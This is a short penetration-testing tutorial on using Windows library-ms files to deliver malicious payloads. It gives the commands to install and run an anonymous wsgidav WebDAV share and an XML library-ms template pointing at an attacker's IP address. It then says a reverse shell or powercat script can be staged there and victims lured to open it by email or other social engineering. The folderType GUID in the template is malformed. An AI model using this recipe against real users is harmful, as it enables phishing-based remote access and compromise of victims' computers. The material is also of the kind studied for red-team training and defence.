Windows Library Files

Windows library files are virtual containers that can be accessed across networks by users. The files have a library-ms extension and can be executed by double-clicking them.

First we have to create a Webdav share in our system that can be accessed through the library-ms file.

Upon double clicking the library-ms file the share appears as a local directory to the user.

First, wsgidav has to be installed on your local machine using the following command,

pip3 install wsgidav

Next, create a directory by the path "/home/kali/webdav" and this folder can contain any malicioius file that will be accessed by the victim.

Now the wsgidav service can be started using the following command,

/home/kali/.local/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/webdav/

Next the library-ms file has to be created using the following code,

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library"> <name>@windows.storage.dll,-34582</name>
<version>6</version>
<isLibraryPinned>true</isLibraryPinned> <iconReference>imageres.dll,-1003</iconReference>
<templateInfo>
<folderType>{7h483j726-3io1-4f05-98ta-fdc8fj92js856}</folderType> </templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription> <isDefaultSaveLocation>true</isDefaultSaveLocation> <isSupported>false</isSupported>
<simpleLocation>
<url>http://192.168.3.7</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>

Now any file such as a reverse shell or powercat script can be placed in this location and the user can be convinced to run the file through an email or by employing any social engineering method.

Last updated